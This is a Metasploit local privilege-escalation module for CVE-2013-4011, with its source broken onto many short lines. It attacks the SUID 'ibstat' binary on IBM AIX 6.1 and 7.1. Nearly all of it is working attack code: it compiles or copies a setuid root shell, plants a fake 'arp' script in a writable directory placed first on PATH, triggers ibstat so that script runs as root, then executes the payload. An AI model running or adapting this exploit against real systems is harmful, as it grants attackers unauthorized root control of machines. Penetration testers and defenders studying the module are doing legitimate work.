##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class
Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::
File
include Msf::Exploit::FileDropper
def
initialize(info = {})
super
(update_info(info,
"Name"
=>
"ibstat $PATH Privilege Escalation"
,
"Description"
=> %q{
This
module
exploits the trusted
$PATH
environment variable of the
SUID
binary
"ibstat"
.
},
"Author"
=> [
"Kristian Erik Hermansen"
,
#original author
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>"
,
#Metasploit module
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>"
#Metasploit module
],
"References"
=> [
[
"CVE"
,
"2013-4011"
],
[
"OSVDB"
,
"95420"
],
[
"BID"
,
"61287"
],
[
"URL"
,
"http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"
],
[
"URL"
,
"http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"
]
],
"Platform"
=> [
"unix"
],
"Arch"
=>
ARCH_CMD
,
"Payload"
=> {
"Compat"
=> {
"PayloadType"
=>
"cmd"
,
"RequiredCmd"
=>
"perl"
}
},
"Targets"
=> [
[
"IBM AIX Version 6.1"
, {}],
[
"IBM AIX Version 7.1"
, {}]
],
"DefaultTarget"
=>
1
,
"DisclosureDate"
=>
"Sep 24 2013"
))
register_options([
OptString.
new
(
"WritableDir"
, [
true
,
"A directory where we can write files"
,
"/tmp"
])
],
self
.
class
)
end
def
check
find_output = cmd_exec(
"find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
)
if
find_output.include?(
"ibstat"
)
return
Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def
exploit
if
check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable,
"Target is not vulnerable."
)
else
print_good(
"Target is vulnerable."
)
end
root_file =
"#{datastore["
WritableDir
"]}/#{rand_text_alpha(8)}"
arp_file =
"#{datastore["
WritableDir
"]}/arp"
c_file = %
Q
^
#include <stdio.h>
int main()
{
setreuid(
0
,
0
);
setregid(
0
,
0
);
execve(
"/bin/sh"
,
NULL
,
NULL
);
return
0
;
}
^
arp = %
Q
^
#!/bin/sh
chown root
#{root_file}
chmod
4555
#{root_file}
^
if
gcc_installed?
print_status(
"Dropping file #{root_file}.c..."
)
write_file(
"#{root_file}.c"
, c_file)
print_status(
"Compiling source..."
)
cmd_exec(
"gcc -o #{root_file} #{root_file}.c"
)
print_status(
"Compilation completed"
)
register_file_for_cleanup(
"#{root_file}.c"
)
else
cmd_exec(
"cp /bin/sh #{root_file}"
)
end
register_file_for_cleanup(root_file)
print_status(
"Writing custom arp file..."
)
write_file(arp_file,arp)
register_file_for_cleanup(arp_file)
cmd_exec(
"chmod 0555 #{arp_file}"
)
print_status(
"Custom arp file written"
)
print_status(
"Updating $PATH environment variable..."
)
path_env = cmd_exec(
"echo $PATH"
)
cmd_exec(
"PATH=#{datastore["
WritableDir
"]}:$PATH"
)
cmd_exec(
"export PATH"
)
print_status(
"Triggering vulnerablity..."
)
cmd_exec(
"/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null"
)
# The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained
print_status(
"Restoring $PATH environment variable..."
)
cmd_exec(
"PATH=#{path_env}"
)
cmd_exec(
"export PATH"
)
cmd_exec(root_file)
print_status(
"Checking root privileges..."
)
if
is_root?
print_status(
"Executing payload..."
)
cmd_exec(payload.encoded)
end
end
def
gcc_installed?
print_status(
"Checking if gcc exists..."
)
gcc_whereis_output = cmd_exec(
"whereis -b gcc"
)
if
gcc_whereis_output.include?(
"/"
)
print_good(
"gcc found!"
)
return
true
end
print_status(
"gcc not found. Using /bin/sh from local system"
)
false
end
def
is_root?
id_output = cmd_exec(
"id"
)
if
id_output.include?(
"euid=0(root)"
)
print_good(
"Got root! (euid)"
)
return
true
end
if
id_output.include?(
"uid=0(root)"
)
print_good(
"Got root!"
)
return
true
end
print_status(
"Exploit failed"
)
false
end
end